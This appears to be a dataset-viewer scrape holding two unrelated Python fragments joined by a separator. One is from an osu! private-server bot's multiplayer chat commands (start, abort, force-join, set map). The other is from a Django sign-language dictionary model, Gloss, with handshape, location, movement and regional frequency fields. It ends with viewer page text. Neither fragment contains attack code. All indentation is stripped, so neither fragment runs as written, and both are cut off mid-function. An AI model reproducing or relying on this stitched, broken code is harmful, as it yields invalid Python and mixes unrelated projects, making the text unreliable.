if not cmd.doc or not p.priv & cmd.priv:
# no doc, or insufficient permissions.
continue
cmds.append(f'{prefix}mp {cmd.triggers[0]}: {cmd.doc}')
return '\n'.join(cmds)
@mp_commands.add(Privileges.Normal, aliases=['st'])
async def mp_start(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
"""Start the current multiplayer match, with any players ready."""
if (msg_len := len(msg)) > 1:
return 'Invalid syntax: !mp start <force/seconds>'
if msg_len == 1:
if msg[0].isdecimal():
# !mp start <seconds>
duration = int(msg[0])
if not 0 < duration <= 300:
return 'Timer range is 1-300 seconds.'
async def delayed_start(wait: int):
await asyncio.sleep(wait)
if p not in m:
# player left match since :monkaS:
return
await m.chat.send(glob.bot, 'Good luck!')
m.start()
asyncio.create_task(delayed_start(duration))
return f'Match will start in {duration} seconds.'
elif msg[0] not in ('force', 'f'):
return 'Invalid syntax: !mp start <force/seconds>'
# !mp start force simply passes through
else:
# !mp start (no force or timer)
if any(s.status == SlotStatus.not_ready for s in m.slots):
return ('Not all players are ready '
'(use `!mp start force` to override).')
m.start()
return 'Good luck!'
@mp_commands.add(Privileges.Normal, aliases=['a'])
async def mp_abort(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
"""Abort the current in-progress multiplayer match."""
if not m.in_progress:
return 'Abort what?'
m.unready_players(expected=SlotStatus.playing)
m.in_progress = False
m.enqueue(packets.matchAbort())
m.enqueue_state()
return 'Match aborted.'
@mp_commands.add(Privileges.Admin, hidden=True)
async def mp_force(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
"""Force a player into the current match by name."""
if len(msg) != 1:
return 'Invalid syntax: !mp force <name>'
if not (t := await glob.players.get(name=' '.join(msg))):
return 'Could not find a user by that name.'
await t.join_match(m, m.passwd)
return 'Welcome.'
@mp_commands.add(Privileges.Normal)
async def mp_map(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
"""Set the current match's current map by id."""
if len(msg) != 1 or not msg[0].isdecimal():
return 'Invalid syntax: !mp map <beatmapid>'
if not (bmap := await Beatmap.from_bid(int(msg[0]))):
return 'Beatmap not | |
Finger Selection pattern stored in hsFingUnsel
try:
fieldSelectionMatch = FieldChoice.objects.filter(field__iexact='FingerSelection',
machine_value=self.hsFingUnsel)
except:
print('set_unselectedFingers failed for: ', self)
return
if not fieldSelectionMatch:
# no finger selection
return
# get the pattern, only one match is returned, in a list because of filter
fingerSelectionPattern = fieldSelectionMatch[0].english_name
self.ufT = 'T' in fingerSelectionPattern
self.ufI = 'I' in fingerSelectionPattern
self.ufM = 'M' in fingerSelectionPattern
self.ufR = 'R' in fingerSelectionPattern
self.ufP = 'P' in fingerSelectionPattern
return
def count_selected_fingers(self):
count_selected_fingers = 0
if self.fsT:
count_selected_fingers += 1
if self.fsI:
count_selected_fingers += 1
if self.fsM:
count_selected_fingers += 1
if self.fsR:
count_selected_fingers += 1
if self.fsP:
count_selected_fingers += 1
return count_selected_fingers
class Gloss(models.Model):
class Meta:
verbose_name_plural = "Glosses"
# ordering: for Lemma View in the Gloss List View, we need to have glosses in the same Lemma Group sorted
ordering = ['lemma']
permissions = (('update_video', "Can Update Video"),
('search_gloss', 'Can Search/View Full Gloss Details'),
('export_csv', 'Can export sign details as CSV'),
('export_ecv', 'Can create an ECV export file of Signbank'),
('can_publish', 'Can publish signs and definitions'),
('can_delete_unpublished', 'Can delete unpub signs or defs'),
('can_delete_published', 'Can delete pub signs and defs'),
('view_advanced_properties', 'Include all properties in sign detail view'),
)
def __str__(self):
return self.idgloss
def field_labels(self):
"""Return the dictionary of field labels for use in a template"""
d = dict()
for f in self._meta.fields:
try:
d[f.name] = _(self._meta.get_field(f.name).verbose_name)
except:
pass
return d
lemma = models.ForeignKey("LemmaIdgloss", null=True, on_delete=models.SET_NULL)
# languages that this gloss is part of
signlanguage = models.ManyToManyField(SignLanguage)
# these language fields are subsumed by the language field above
bsltf = models.NullBooleanField(_("BSL sign"), null=True, blank=True)
asltf = models.NullBooleanField(_("ASL sign"), null=True, blank=True)
# these fields should be reviewed - do we put them in another class too?
aslgloss = models.CharField(_("ASL gloss"), blank=True, max_length=50) # American Sign Language gloss
asloantf = models.NullBooleanField(_("ASL loan sign"), null=True, blank=True)
# loans from british sign language
bslgloss = models.CharField(_("BSL gloss"), max_length=50, blank=True)
bslloantf = models.NullBooleanField(_("BSL loan sign"), null=True, blank=True)
useInstr = models.CharField(_("Annotation instructions"), max_length=50, blank=True)
rmrks = models.CharField(_("Remarks"), max_length=50, blank=True)
########
# one or more regional dialects that this gloss is used in
dialect = models.ManyToManyField(Dialect)
blend = models.CharField(_("Blend of"), max_length=100, null=True, blank=True) # This field type is a guess.
blendtf = models.NullBooleanField(_("Blend"), null=True, blank=True)
compound = models.CharField(_("Compound of"), max_length=100, blank=True) # This field type is a guess.
comptf = models.NullBooleanField(_("Compound"), null=True, blank=True)
# Phonology fields
handedness = models.CharField(_("Handedness"), blank=True, null=True, choices=build_choice_list("Handedness"),
max_length=5)
handedness.field_choice_category = 'Handedness'
weakdrop = models.NullBooleanField(_("Weak Drop"), null=True, blank=True)
weakprop = models.NullBooleanField(_("Weak Prop"), null=True, blank=True)
domhndsh = models.CharField(_("Strong Hand"), blank=True, null=True, choices=build_choice_list("Handshape"),
max_length=5)
domhndsh.field_choice_category = 'Handshape'
subhndsh = models.CharField(_("Weak Hand"), null=True, choices=build_choice_list("Handshape"), blank=True,
max_length=5)
subhndsh.field_choice_category = 'Handshape'
# Support for handshape etymology
domhndsh_number = models.NullBooleanField(_("Strong hand number"), null=True, blank=True)
domhndsh_letter = models.NullBooleanField(_("Strong hand letter"), null=True, blank=True)
subhndsh_number = models.NullBooleanField(_("Weak hand number"), null=True, blank=True)
subhndsh_letter = models.NullBooleanField(_("Weak hand letter"), null=True, blank=True)
final_domhndsh = models.CharField(_("Final Dominant Handshape"), blank=True, null=True,
choices=build_choice_list("Handshape"), max_length=5)
final_domhndsh.field_choice_category = 'Handshape'
final_subhndsh = models.CharField(_("Final Subordinate Handshape"), null=True,
choices=build_choice_list("Handshape"), blank=True, max_length=5)
final_subhndsh.field_choice_category = 'Handshape'
locprim = models.CharField(_("Location"), choices=build_choice_list("Location"), null=True, blank=True,
max_length=20)
locprim.field_choice_category = 'Location'
final_loc = models.IntegerField(_("Final Primary Location"), choices=build_choice_list("Location"), null=True,
blank=True)
final_loc.field_choice_category = 'Location'
locVirtObj = models.CharField(_("Virtual Object"), blank=True, null=True, max_length=50)
locsecond = models.IntegerField(_("Secondary Location"), choices=build_choice_list("Location"), null=True,
blank=True)
locsecond.field_choice_category = 'Location'
initial_secondary_loc = models.CharField(_("Initial Subordinate Location"),
choices=build_choice_list("MinorLocation"), max_length=20, null=True,
blank=True)
initial_secondary_loc.field_choice_category = 'MinorLocation'
final_secondary_loc = models.CharField(_("Final Subordinate Location"), choices=build_choice_list("MinorLocation"),
max_length=20, null=True, blank=True)
final_secondary_loc.field_choice_category = 'MinorLocation'
initial_palm_orientation = models.CharField(_("Initial Palm Orientation"), max_length=20, null=True, blank=True)
final_palm_orientation = models.CharField(_("Final Palm Orientation"), max_length=20, null=True, blank=True)
initial_relative_orientation = models.CharField(_("Initial Interacting Dominant Hand Part"), null=True,
max_length=20, blank=True)
final_relative_orientation = models.CharField(_("Final Interacting Dominant Hand Part"), null=True, max_length=20,
blank=True)
domSF = models.CharField("Dominant hand - Selected Fingers",
choices=build_choice_list("DominantHandSelectedFingers"), null=True, blank=True,
max_length=5)
domSF.field_choice_category = 'DominantHandSelectedFingers'
domFlex = models.CharField("Dominant hand - Flexion", choices=build_choice_list("DominantHandFlexion"), null=True,
blank=True, max_length=5)
domFlex.field_choice_category = 'DominantHandFlexion'
oriChAbd = models.NullBooleanField(_("Abduction change"), null=True, blank=True)
oriChFlex = models.NullBooleanField(_("Flexion change"), null=True, blank=True)
inWeb = models.NullBooleanField(_("In the Web dictionary"), default=False)
isNew = models.NullBooleanField(_("Is this a proposed new sign?"), null=True, default=False)
excludeFromEcv = models.NullBooleanField(_("Exclude from ECV"), default=False)
inittext = models.CharField(max_length=50, blank=True)
morph = models.CharField(_("Morphemic Analysis"), max_length=50, blank=True)
# zero or more morphemes that are used in this sign-word (=gloss) #175
morphemePart = models.ManyToManyField('Morpheme', blank=True)
sedefinetf = models.TextField(_("Signed English definition available"), null=True,
blank=True) # TODO: should be boolean
segloss = models.CharField(_("Signed English gloss"), max_length=50, blank=True, null=True)
sense = models.IntegerField(_("Sense Number"), null=True, blank=True,
help_text="If there is more than one sense of a sign enter a number here, all signs with sense>1 will use the same video as sense=1")
sense.list_filter_sense = True
sn = models.IntegerField(_("Sign Number"),
help_text="Sign Number must be a unique integer and defines the ordering of signs in the dictionary",
null=True, blank=True, unique=True)
# this is a sign number - was trying
# to be a primary key, also defines a sequence - need to keep the sequence
# and allow gaps between numbers for inserting later signs
StemSN = models.IntegerField(null=True, blank=True)
relatArtic = models.CharField(_("Relation between Articulators"), choices=build_choice_list("RelatArtic"),
null=True, blank=True, max_length=5)
relatArtic.field_choice_category = 'RelatArtic'
absOriPalm = models.CharField(_("Absolute Orientation: Palm"), choices=build_choice_list("AbsOriPalm"), null=True,
blank=True, max_length=5)
absOriPalm.field_choice_category = 'AbsOriPalm'
absOriFing = models.CharField(_("Absolute Orientation: Fingers"), choices=build_choice_list("AbsOriFing"),
null=True, blank=True, max_length=5)
absOriFing.field_choice_category = 'AbsOriFing'
relOriMov = models.CharField(_("Relative Orientation: Movement"), choices=build_choice_list("RelOriMov"), null=True,
blank=True, max_length=5)
relOriMov.field_choice_category = 'RelOriMov'
relOriLoc = models.CharField(_("Relative Orientation: Location"), choices=build_choice_list("RelOriLoc"), null=True,
blank=True, max_length=5)
relOriLoc.field_choice_category = 'RelOriLoc'
oriCh = models.CharField(_("Orientation Change"), choices=build_choice_list("OriChange"), null=True, blank=True,
max_length=5)
oriCh.field_choice_category = 'OriChange'
handCh = models.CharField(_("Handshape Change"), choices=build_choice_list("HandshapeChange"), null=True,
blank=True, max_length=5)
handCh.field_choice_category = 'HandshapeChange'
repeat = models.NullBooleanField(_("Repeated Movement"), null=True, default=False)
altern = models.NullBooleanField(_("Alternating Movement"), null=True, default=False)
movSh = models.CharField(_("Movement Shape"), choices=build_choice_list("MovementShape"), null=True, blank=True,
max_length=5)
movSh.field_choice_category = 'MovementShape'
movDir = models.CharField(_("Movement Direction"), choices=build_choice_list("MovementDir"), null=True, blank=True,
max_length=5)
movDir.field_choice_category = 'MovementDir'
movMan = models.CharField(_("Movement Manner"), choices=build_choice_list("MovementMan"), null=True, blank=True,
max_length=5)
movMan.field_choice_category = 'MovementMan'
contType = models.CharField(_("Contact Type"), choices=build_choice_list("ContactType"), null=True, blank=True,
max_length=5)
contType.field_choice_category = 'ContactType'
phonOth = models.TextField(_("Phonology Other"), null=True, blank=True)
mouthG = models.CharField(_("Mouth Gesture"), max_length=50, blank=True)
mouthing = models.CharField(_("Mouthing"), max_length=50, blank=True)
phonetVar = models.CharField(_("Phonetic Variation"), max_length=50, blank=True, )
locPrimLH = models.CharField(_("Placement Active Articulator LH"), choices=build_choice_list("Location"), null=True,
blank=True, max_length=5)
locPrimLH.field_choice_category = 'Location'
locFocSite = models.CharField(_("Placement Focal Site RH"), null=True, blank=True, max_length=5)
locFocSiteLH = models.CharField(_("Placement Focal site LH"), null=True, blank=True, max_length=5)
initArtOri = models.CharField(_("Orientation RH (initial)"), null=True, blank=True, max_length=5)
finArtOri = models.CharField(_("Orientation RH (final)"), null=True, blank=True, max_length=5)
initArtOriLH = models.CharField(_("Orientation LH (initial)"), null=True, blank=True, max_length=5)
finArtOriLH = models.CharField(_("Orientation LH (final)"), null=True, blank=True, max_length=5)
# Semantic fields
iconImg = models.CharField(_("Iconic Image"), max_length=50, blank=True)
iconType = models.CharField(_("Type of iconicity"), choices=build_choice_list("iconicity"), null=True, blank=True,
max_length=5)
iconType.field_choice_category = 'iconicity'
namEnt = models.CharField(_("Named Entity"), choices=build_choice_list("NamedEntity"), null=True, blank=True,
max_length=5)
namEnt.field_choice_category = 'NamedEntity'
semField = models.CharField(_("Semantic Field"), choices=build_choice_list("SemField"), null=True, blank=True,
max_length=5)
semField.field_choice_category = 'SemField'
wordClass = models.CharField(_("Word class"), null=True, blank=True, max_length=5,
choices=build_choice_list('WordClass'))
wordClass.field_choice_category = 'WordClass'
wordClass2 = models.CharField(_("Word class 2"), null=True, blank=True, max_length=5,
choices=build_choice_list('WordClass'))
wordClass2.field_choice_category = 'WordClass'
derivHist = models.CharField(_("Derivation history"), choices=build_choice_list("derivHist"), max_length=50,
blank=True)
derivHist.field_choice_category = 'derivHist'
lexCatNotes = models.CharField(_("Lexical category notes"), null=True, blank=True, max_length=300)
valence = models.CharField(_("Valence"), choices=build_choice_list("Valence"), null=True, blank=True, max_length=50)
valence.field_choice_category = 'Valence'
concConcSet = models.CharField(_("Conception Concept Set"), null=True, blank=True, max_length=300)
# Frequency fields
tokNo = models.IntegerField(_("Number of Occurrences"), null=True, blank=True)
tokNoSgnr = models.IntegerField(_("Number of Signers"), null=True, blank=True)
tokNoA = models.IntegerField(_("Number of Occurrences in Amsterdam"), null=True, blank=True)
tokNoV = models.IntegerField(_("Number of Occurrences in Voorburg"), null=True, blank=True)
tokNoR = models.IntegerField(_("Number of Occurrences in Rotterdam"), null=True, blank=True)
tokNoGe = models.IntegerField(_("Number of Occurrences in Gestel"), null=True, blank=True)
tokNoGr = models.IntegerField(_("Number of Occurrences in Groningen"), null=True, blank=True)
tokNoO = models.IntegerField(_("Number of Occurrences in Other Regions"), null=True, blank=True)
tokNoSgnrA = models.IntegerField(_("Number of Amsterdam Signers"), null=True, blank=True)
tokNoSgnrV = models.IntegerField(_("Number of Voorburg Signers"), null=True, blank=True)
tokNoSgnrR = models.IntegerField(_("Number of Rotterdam Signers"), null=True, blank=True)
tokNoSgnrGe = models.IntegerField(_("Number of Gestel Signers"), null=True, blank=True)
tokNoSgnrGr = models.IntegerField(_("Number of Groningen Signers"), null=True, blank=True)
tokNoSgnrO = models.IntegerField(_("Number of Other Region Signers"), null=True, blank=True)
creationDate = models.DateField(_('Creation date'), default=datetime(2015, 1, 1))
lastUpdated = models.DateTimeField(_('Last updated'), auto_now=True)
creator = models.ManyToManyField(User)
alternative_id = models.CharField(max_length=50, null=True, blank=True)
@property
def dataset(self):
try:
return self.lemma.dataset
except:
return None
@property
def idgloss(self):
try:
return self.lemma.lemmaidglosstranslation_set.get(language=self.lemma.dataset.default_language).text
except:
pass
try:
return self.lemma.lemmaidglosstranslation_set.get(
language__language_code_2char=settings.DEFAULT_KEYWORDS_LANGUAGE['language_code_2char']).text
except:
pass
try:
return self.lemma.lemmaidglosstranslation_set.first().text
except:
return |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.